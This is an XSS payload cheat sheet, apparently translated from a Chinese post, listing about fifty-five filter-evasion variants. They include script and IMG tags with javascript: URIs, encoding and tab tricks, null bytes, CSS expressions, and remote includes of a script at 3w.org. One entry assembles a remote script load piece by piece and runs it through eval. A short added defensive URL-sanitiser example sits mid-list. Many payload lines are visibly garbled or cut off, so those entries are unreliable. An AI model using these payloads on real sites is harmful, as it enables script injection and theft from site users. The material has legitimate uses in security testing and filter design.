(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up boxes
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolon required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically have no effect domestically, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

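A defensive counterpart to items (3) through (18) and (47), added here and not part of the original post: it canonicalises a URL attribute value (decoding numeric character references, dropping the ignored code points listed in item (47), lowercasing) before checking the scheme against an allow-list, and shows that a literal `javascript:` comparison misses the variants above. The sample values, the allow-list, and the reading of the page's `8192-8` as 8192 through 8200 are assumptions.

```javascript
// Added example: canonicalise a URL attribute before checking its scheme.

// Code points that browsers drop or ignore inside a URL scheme, built from the list in
// item (47): 1-32, 34, 39, 160, 8192-8 (taken here as 8192-8200, an assumption), 13,
// 12288, 65279. 0 is included as well to cover the null-byte variants in (17) and (18).
const IGNORED = new Set([34, 39, 160, 12288, 65279]);
for (let cp = 0; cp <= 32; cp++) IGNORED.add(cp);
for (let cp = 8192; cp <= 8200; cp++) IGNORED.add(cp);

// Decode numeric character references, with or without the trailing semicolon,
// as the missing-semicolon forms in items (9) and (10) rely on.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// Canonical form: decode references, drop ignored code points, lowercase (item (4)).
function canonicalise(value) {
  let out = '';
  for (const ch of decodeEntities(value)) {
    if (!IGNORED.has(ch.codePointAt(0))) out += ch;
  }
  return out.toLowerCase();
}

// The naive filter: a literal, case-sensitive prefix test on the raw attribute value.
function naiveIsDangerous(value) {
  return value.startsWith('javascript:');
}

// The hardened check: canonicalise first, then allow only an explicit scheme list.
// Values without a scheme are treated as relative URLs and allowed.
const ALLOWED_SCHEMES = ['http', 'https', 'mailto'];
function isSafeUrl(value) {
  const m = /^([a-z][a-z0-9+.-]*):/.exec(canonicalise(value));
  if (!m) return true;
  return ALLOWED_SCHEMES.includes(m[1]);
}

// Constructed sample attribute values mirroring the page's variants.
const SAMPLES = {
  mixedCase: 'JaVaScRiPt:alert(1)',                     // (4)
  decimalRefs: '&#106;&#97;&#118;&#97;script:alert(1)', // (5), first four characters only
  embeddedTab: 'jav\tascript:alert(1)',                 // (11)
  encodedTab: 'jav&#x09;ascript:alert(1)',              // (12)
  nullByte: 'java\0script:alert(1)',                    // (17)
  benign: 'https://example.org/a.png',
};
```

Because the check is an allow-list on the canonical scheme, a new obfuscation of `javascript:` fails closed instead of needing another deny-list entry.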
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an opening angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>